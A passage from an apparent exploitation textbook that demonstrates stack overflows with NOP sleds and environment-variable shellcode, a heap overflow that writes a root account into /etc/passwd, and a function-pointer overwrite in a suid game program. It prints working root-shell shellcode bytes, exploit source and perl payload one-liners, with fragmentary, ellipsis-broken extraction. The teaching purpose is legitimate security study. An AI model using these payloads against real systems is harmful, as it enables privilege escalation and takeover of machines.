the check_authentication() function returns, execution jumps directly to the
new target address instead of returning to the next instruction after the call
...

136

0x 300

The notesearch program is vulnerable to a buffer overflow on the line
marked in bold here
...

The notesearch exploit uses a similar technique to overflow a buffer into
the return address; however, it also injects its own instructions into memory
and then returns execution there
...
This is
especially devastating for the notesearch program, since it is suid root
...

But when new instructions can be injected in and execution can be
controlled with a buffer overflow, the program logic is meaningless
...
This is the dangerous combination that allows the notesearch exploit to gain a root shell
...

reader@hacking:~/booksrc $ gcc -g exploit_notesearch
...
/a
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...

15
16
strcpy(command, "
...

17
buffer = command + strlen(command); // Set buffer at the end
...

Ex pl oit a ti on

137

20
offset = atoi(argv[1]);
(gdb)
21
22
ret = (unsigned int) &i - offset; // Set return address
...

25
*((unsigned int *)(buffer+i)) = ret;
26
memset(buffer, 0x90, 60); // Build NOP sled
...
c, line 26
...
c, line 27
...
c, line 28
...
The first part is a for loop that fills the buffer with a 4-byte
address stored in the ret variable
...
This
value is added to the buffer address, and the whole thing is typecast as a
unsigned integer pointer
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:26
26
memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/40x buffer
0x804a016:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a026:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a036:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a046:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a056:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a066:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a076:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a086:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a096:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a0a6:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
(gdb) x/s command
0x804a008:
"
...
You can also see the relationship between the command pointer and
the buffer pointer
...

138

0x 300

(gdb) cont
Continuing
...
c:27
27
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
(gdb) x/40x buffer
0x804a016:
0x90909090
0x90909090
0x90909090
0x90909090
0x804a026:
0x90909090
0x90909090
0x90909090
0x90909090
0x804a036:
0x90909090
0x90909090
0x90909090
0x90909090
0x804a046:
0x90909090
0x90909090
0x90909090
0xbffff6f6
0x804a056:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a066:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a076:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a086:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a096:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a0a6:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
(gdb) x/s command
0x804a008:
"
...

(gdb) cont
Continuing
...
c:29
29
strcat(command, "\'");
(gdb) x/40x buffer
0x804a016:
0x90909090
0x90909090
0x90909090
0x90909090
0x804a026:
0x90909090
0x90909090
0x90909090
0x90909090
0x804a036:
0x90909090
0x90909090
0x90909090
0x90909090
0x804a046:
0x90909090
0x90909090
0x90909090
0x3158466a
0x804a056:
0xcdc931db
0x2f685180
0x6868732f
0x6e69622f
0x804a066:
0x5351e389
0xb099e189
0xbf80cd0b
0xbffff6f6
0x804a076:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a086:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a096:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
0x804a0a6:
0xbffff6f6
0xbffff6f6
0xbffff6f6
0xbffff6f6
(gdb) x/s command
0x804a008:
"
...
The difficulty of finding the exact location of the
return address is eased by using the repeated return address technique
...

This means the actual address must be known ahead of time, before it even
goes into memory
...
Fortunately, there is another hacking technique,

Ex pl oit a ti on

139

called the NOP sled, that can assist with this difficult chicanery
...
It is a single-byte instruction
that does absolutely nothing
...
In this case, NOP
instructions are going to be used for a different purpose: as a fudge factor
...
This means that as long as the
return address is overwritten with any address found in the NOP sled, the EIP
register will slide down the sled to the shellcode, which will execute properly
...
This means our completed exploit buffer looks something like this:
NOP sled

Shellcode

Repeated return address

Even with a NOP sled, the approximate location of the buffer in memory
must be predicted in advance
...
By subtracting an offset from this location, the relative address of any variable can be
obtained
...
c
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

In the notesearch exploit, the address of the variable i in main()’s stack
frame is used as a point of reference
...
This offset was previously determined to be 270, but how is this number calculated?
The easiest way to determine this offset is experimentally
...

140

0x 300

Since the notesearch exploit allows an optional command-line argument
to define the offset, different offsets can quickly be tested
...
c
reader@hacking:~/booksrc $
...
out 100
-------[ end of note data ]------reader@hacking:~/booksrc $
...
out 200
-------[ end of note data ]------reader@hacking:~/booksrc $

However, doing this manually is tedious and stupid
...
The seq command is a simple
program that generates sequences of numbers, which is typically used with
looping
...
When three arguments are used, the middle
argument dictates how much to increment each time
...

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)
> do
> echo The value is $i
> done
The value is 1
The value is 4
The value is 7
The value is 10
reader@hacking:~/booksrc $

Ex pl oit a ti on

141

The function of the for loop should be familiar, even if the syntax is a
little different
...
Then everything between the do and
done keywords is executed
...
Since the NOP sled is 60 bytes long, and we can return anywhere on
the sled, there is about 60 bytes of wiggle room
...

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
>
...
out $i
> done
Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

When the right offset is used, the return address is overwritten with a
value that points somewhere on the NOP sled
...
This is how the default offset value was discovered
...
Fortunately, there
are other locations in memory where shellcode can be stashed
...
The example below sets an environment variable called
MYVAR to the string test
...
In addition, the env command will show all the
environment variables
...

reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/
...
2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*
...
tgz=01;31:*
...
taz=01;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:*
...
rpm=01;31:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:*
...
ppm=01;35:*
...
xbm=01;35:*
...
tif=01;35:*
...
png=01;35:*
...
mpg=01;35:*
...
avi=01;35:*
...
gl=01;35:*
...
xcf=01;35:*
...
flac=01;35:*
...
mpc=01;35:*
...
wav=01;35:
SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent
...
ICE-unix/7489
USERNAME=reader
DESKTOP_SESSION=default
...
UTF-8
GDMSESSION=default
...
0
MYVAR=test
LESSCLOSE=/usr/bin/lesspipe %s %s
RUNNING_UNDER_GDM=yes
COLORTERM=gnome-terminal
XAUTHORITY=/home/reader/
...
The shellcode from
the notesearch exploit can be used; we just need to put it into a file in binary
form
...

reader@hacking:~/booksrc $ head exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
reader@hacking:~/booksrc $ head exploit_notesearch
...
c | grep "^\"" | cut -d\" -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68

Ex pl oit a ti on

143

\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $

The first 10 lines of the program are piped into grep, which only shows the
lines that begin with a quotation mark
...

BASH’s for loop can actually be used to send each of these lines to an
echo command, with command-line options to recognize hex expansion and
to suppress adding a newline character to the end
...
bin
reader@hacking:~/booksrc
00000000 31 c0 31 db 31
00000010 2f 2f 73 68 68
00000020 e1 cd 80
00000023
reader@hacking:~/booksrc

$ for i in $(head exploit_notesearch
...
bin
c9 99 b0 a4 cd 80 6a 0b 58 51 68
2f 62 69 6e 89 e3 51 89 e2 53 89

|1
...
1
...
XQh|
|//shh/bin
...
S
...
|

$

Now we have the shellcode in a file called shellcode
...
This can be used
with command substitution to put shellcode into an environment variable,
along with a generous NOP sled
...
bin)
reader@hacking:~/booksrc $ echo $SHELLCODE

1 1 1

j
XQh//shh/bin

Q

S

reader@hacking:~/booksrc $

And just like that, the shellcode is now on the stack in an environment
variable, along with a 200-byte NOP sled
...
The environment variables are located near the bottom of the
stack, so this is where we should look when running notesearch in a debugger
...
/notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

This will set up memory for the program, but it will stop before anything
happens
...

(gdb) i r esp
esp
0xbffff660
0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0:
""
0xbffff8a1:
""
0xbffff8a2:
""
0xbffff8a3:
""
0xbffff8a4:
""
0xbffff8a5:
""
0xbffff8a6:
""
0xbffff8a7:
""
0xbffff8a8:
""
0xbffff8a9:
""
0xbffff8aa:
""
0xbffff8ab:
"i686"
0xbffff8b0:
"/home/reader/booksrc/notesearch"
0xbffff8d0:
"SSH_AGENT_PID=7531"
0xbffffd56:
"SHELLCODE=", '\220'
...
gtkrc-1
...
tar=01;31:*
...
arj=01
;31:*
...

0xbffffb29:
"1;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:*
...
rpm=01;3
1:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:*
...
ppm=01
;35:*
...

(gdb) x/s 0xbffff8e3
0xbffff8e3:
"SHELLCODE=", '\220'
...

(When the program is run outside of the debugger, these addresses might
be a little different
...
But with a 200-byte NOP sled, these
inconsistencies aren’t a problem if an address near the middle of the sled is
picked
...
After
determining the address of the injected shellcode instructions, the exploitation is simply a matter of overwriting the return address with this address
...
/notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------sh-3
...
2#

The target address is repeated enough times to overflow the return address,
and execution returns into the NOP sled in the environment variable, which
inevitably leads to the shellcode
...
This usually makes exploitations quite a bit easier
...
In C’s standard
library there is a function called getenv(), which accepts the name of an environment variable as its only argument and returns that variable’s memory address
...
c demonstrates the use of getenv()
...
c
#include ...
h>
int main(int argc, char *argv[]) {
printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

When compiled and run, this program will display the location of a given
environment variable in its memory
...

reader@hacking:~/booksrc $ gcc getenv_example
...
/a
...
/notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------sh-3
...
This means the environment prediction is still off
...
bin)
reader@hacking:~/booksrc $
...
out SLEDLESS
SLEDLESS is at 0xbfffff46

146

0x 300

reader@hacking:~/booksrc $
...
The length of the name of the program
being executed seems to have an effect on the address of the environment
variables
...
This type of experimentation and pattern
recognition is an important skill for a hacker to have
...
out a
reader@hacking:~/booksrc $
...
out bb
reader@hacking:~/booksrc $
...
out ccc
reader@hacking:~/booksrc $
...
/a
...

The general trend seems to be a decrease of two bytes in the address of the
environment variable for every single-byte increase in the length of the program name
...
out, since the difference in length between the names a
...
This must mean
the name of the executing program is also located on the stack somewhere,
which is causing the shifting
...
This means
the crutch of a NOP sled can be eliminated
...
c program
adjusts the address based on the difference in program name length to provide
a very accurate prediction
...
c
#include ...
h>
#include ...
*/
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name
...
This
can be used to exploit stack-based buffer overflows without the need for a
NOP sled
...
c
reader@hacking:~/booksrc $
...
/notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $
...
The
use of environment variables simplifies things considerably when exploiting
from the command line, but these variables can also be used to make exploit
code more reliable
...
c program to
execute a command
...
The -c tells the sh program to execute commands
from the command-line argument passed to it
...

Go to http://www
...
com/codesearch?q=package:libc+system to see
this code in its entirety
...
2
...
The fork() function
starts a new process, and the execl() function is used to run the command
through /bin/sh with the appropriate command-line arguments
...
If a setuid program
uses system(), the privileges won’t be transferred, because /bin/sh has been
dropping privileges since version two
...
We can
ignore the fork() and just focus on the execl() function to run the command
...
The arguments for
execl() start with the path to the target program and are followed by each of
the command-line arguments
...
The last
argument is a NULL to terminate the argument list, similar to how a null
byte terminates a string
...
This environment is presented in the form of an array of
pointers to null-terminated strings for each environment variable, and the
environment array itself is terminated with a NULL pointer
...
If the environment array is just the
shellcode as the first string (with a NULL pointer to terminate the list), the
only environment variable will be the shellcode
...
In Linux, the address will be 0xbffffffa, minus the length of the
shellcode in the environment, minus the length of the name of the executed
program
...
All
that’s needed in the exploit buffer is the address, repeated enough times to
overflow the return address in the stack, as shown in exploit_nosearch_env
...

exploit_notesearch_env
...
h>
...
h>
...
/notesearch");
for(i=0; i < 160; i+=4)
*((unsigned int *)(buffer+i)) = ret;
execle("
...
Also, it doesn’t start any additional processes
...
c
reader@hacking:~/booksrc $
...
out
-------[ end of note data ]------sh-3
...

As in auth_overflow
...
This
is true regardless of the memory segment these variables reside in; however,
the control tends to be quite limited
...
While these types of overflows aren’t as standardized as
stack-based overflows, they can be just as effective
...
Two buffers are allocated on the heap, and the first
command-line argument is copied into the first buffer
...

Excerpt from notetaker
...

strcpy(buffer, argv[1]);

// Copy into buffer
...
The distance between these two addresses is 104 bytes
...
/notetaker test
[DEBUG] buffer
@ 0x804a008: 'test'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...

reader@hacking:~/booksrc $
...
This causes the datafile to
be nothing but a single null byte, which obviously cannot be opened as a file
...
/notetaker $(perl -e 'print "A"x104
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
This causes the program to write to testfile instead of
/var/notes, as it was originally programmed to do
...
Similar to the return address
overwrite with stack overflows, there are control points within the heap
architecture itself
...
Since version 2
...
5, these functions have been rewritten
to print debugging information and terminate the program when they
detect problems with the heap header information
...
However, this particular exploit doesn’t
use heap header information to do its magic, so by the time free() is called,
the program has already been tricked into writing to a new file with root
privileges
...
c
if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
/testfile
-rw------- 1 root reader 118 2007-09-09 16:19
...
/testfile
cat:
...
/testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $

152

0x 300

A string is read until a null byte is encountered, so the entire string is
written to the file as the userinput
...
This also means that since the filename can
be controlled, data can be appended to any file
...

There are probably several clever ways to exploit this type of capability
...
This file contains all of the usernames, IDs, and login shells for all the
users of the system
...

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd
...
The password fields are all filled with
the x character, since the encrypted passwords are stored elsewhere in a
shadow file
...
)
In addition, any entry in the password file that has a user ID of 0 will be given
root privileges
...

The password can be encrypted using a one-way hashing algorithm
...
To prevent lookup attacks, the algorithm uses a salt
value, which when varied creates a different hash value for the same input
password
...
The first argument is the password, and the second is the salt
value
...

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA")
...
"\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $

Notice that the salt value is always at the beginning of the hash
...
Using the salt value from the stored encrypted password, the
system uses the same one-way hashing algorithm to encrypt whatever text
the user typed as the password
...
This
allows the password to be used for authentication without requiring that the
password be stored anywhere on the system
...
The line to
append to /etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won’t allow
that exact line to be written to /etc/passwd, because the string must end with
/etc/passwd
...
This can be compensated
for with the clever use of a symbolic file link, so the entry can both end with
/etc/passwd and still be a valid line in the password file
...
This means
that a valid login shell for the password file is also /tmp/etc/passwd, making
the following a valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values of this line just need to be slightly modified so that the portion
before /etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc
38
reader@hacking:~/booksrc
| wc -c
86
reader@hacking:~/booksrc
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc
| wc -c
104
reader@hacking:~/booksrc

$ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c
$ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...
":/root:/tmp"'

$ gdb -q

$ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...
":/root:/tmp"'

$

If /etc/passwd is added to the end of that final string (shown in bold), the
string above will be appended to the end of the /etc/passwd file
...

reader@hacking:~/booksrc $
...
"A"x68
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
c program enough, you will realize
that, similar to at a casino, most of the games are statistically weighted in
favor of the house
...
Perhaps there’s a way to even the odds a bit
...
This pointer is stored
in the user structure, which is declared as a global variable
...

From game_of_chance
...

// Global variables
struct user player;

// Player struct

The name buffer in the user structure is a likely place for an overflow
...

void input_name() {
char *name_ptr, input_char='\n';
while(input_char == '\n')
// Flush any leftover
scanf("%c", &input_char); // newline chars
...
name); // name_ptr = player name's address
while(input_char != '\n') { // Loop until newline
...

scanf("%c", &input_char); // Get the next char
...

}
*name_ptr = 0; // Terminate the string
...
There is nothing
to limit it to the length of the destination name buffer, meaning an overflow
is possible
...
This happens in the
play_the_game() function, which is called when any game is selected from the
menu
...

156

0x 300

if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set,
if(choice == 1)
// then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game();
// Play the game
...
This means that in order to
get the program to call the function pointer without overwriting it, a game
must be played first to set the last_game variable
...
/game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] -> 1
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: 5
The winning number is 17
Sorry, you didn't win
...
/game_of_chance

You can temporarily suspend the current process by pressing CTRL-Z
...

Back at the shell, we figure out an appropriate overflow buffer, which can
be copied and pasted in as a name later
...
As the output below shows, the
name buffer is 100 bytes from the current_game pointer within the user
structure
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
c, line 41
...
out
Breakpoint 1, main () at game_of_chance
...

(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' ,
current_game = 0}
(gdb) x/x &player
...
current_game
0x804b6d0 : 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running
...
This can be copied and pasted into the interactive Game of
Chance program when it is resumed
...

reader@hacking:~/booksrc $ perl -e 'print "A"x100
...
"\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg

...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] -> 1
[DEBUG] current_game pointer @ 0x42424242
Segmentation fault
reader@hacking:~/booksrc $

Select menu option 5 to change the username, and paste in the overflow
buffer
...
When menu
option 1 is selected again, the program will crash when it tries to call the
function pointer
...

The nm command lists symbols in object files
...

reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
w __gmon_start__
08049669 T __i686
...
bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
U __libc_start_main@@GLIBC_2
...
0
0804b640 b completed
...
0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
U getuid@@GLIBC_2
...
0
U open@@GLIBC_2
...
0
U perror@@GLIBC_2
...
0
U rand@@GLIBC_2
...
0
08048aaf T register_new_player
U scanf@@GLIBC_2
...
0
U strcpy@@GLIBC_2
...
0
08048e91 T take_wager
U time@@GLIBC_2
...
0
reader@hacking:~/booksrc $

The jackpot() function is a wonderful target for this exploit
...
Instead, the jackpot() function will just be called
directly, doling out the reward of 100 credits and tipping the scales in the
player’s direction
...
The menu selections
can be scripted in a single buffer that is piped to the program’s standard
160

0x 300

input
...
The following
example will choose menu item 1, try to guess the number 7, select n when
asked to play again, and finally select menu item 7 to quit
...
/game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win
...

reader@hacking:~/booksrc $

This same technique can be used to script everything needed for the
exploit
...
This will overflow the current_game function pointer, so when
the Pick a Number game is played again, the jackpot() function is called
directly
...
"A"x100
...
"1\nn\n"
...
"A"x100
...
"1\nn\n"
...
/game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 15
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 40 credits] ->

162

0x 300

[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 140 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
Thanks for playing! Bye
...

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n"
...
"\x70\
x8d\x04\x08\n"
...
"y\n"x10
...
/
game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 230 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 330 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 430 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 530 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 630 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!

164

0x 300

You now have 730 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 830 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 930 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1030 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1130 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1230 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 1230 credits] ->
Change user name
Enter your new name: Your name has been changed
...

reader@hacking:~/booksrc $

As you might have already noticed, this program also runs suid root
...
As
with the stack-based overflow, shellcode can be stashed in an environment
variable
...
Notice the dash argument following the
exploit buffer in the cat command
...
Even though
the root shell doesn’t display its prompt, it is still accessible and still escalates
privileges
...
/shellcode
...
/getenvaddr SHELLCODE
...
"A"x100
...
"1\n"' > exploit_buffer
reader@hacking:~/booksrc $ cat exploit_buffer - |
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

You now have 60 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits

166

0x 300

7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
Change user name
Enter your new name: Your name has been changed
...
Like buffer overflow exploits, format string exploits also
depend on programming mistakes that may not appear to have an obvious
impact on security
...

